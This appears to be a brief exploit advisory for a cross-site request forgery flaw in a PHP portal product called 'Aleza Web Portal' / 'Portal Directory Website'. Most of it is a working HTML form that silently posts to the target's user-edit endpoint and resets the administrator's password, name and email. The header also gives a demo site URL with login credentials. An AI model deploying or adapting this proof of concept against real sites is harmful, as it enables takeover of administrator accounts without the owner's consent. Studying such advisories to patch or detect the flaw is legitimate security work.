< ------------------- header data start ------------------- >

#############################################################

# Application Name : Portal Directory Website

# vulnerable Type : XSRF

# Infection : Administrator sifreleri degistirilebilir.

# Home : ozkanbozkurt.com

# author : BARCOD3

# Demo : http://portal.dt6software.com/pages/Home

Demo User; admin
Demo password; demo

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<title>BARCOD3 - Aleza Web Portal XSRF Bug for Bug Researchers - code Hunters TIM </title>
<form method=post name=formuserfields id=formuserfields action=victim.com/pages/panel/op/users/panelarea/user enctype=multipart/form-data >
<input type=hidden name=userfields[password] value=passWORD size=15 maxlength=30 />
<input type=hidden name=userfields[password2] value=passWORD size=15 maxlength=30 />
<input type=hidden name=userfields[realname] value=Admin size=40 maxlength=255 />
<input type=hidden name=userfields[email] value=[email protected] size=32 maxlength=255 />
<input type=submit name=userfields[confirm] value=update />
<input type=hidden name=edit value=1 />
<input type=hidden name=edit_userfields value=1 />
</table>

</form>
< -- bug code end of -- >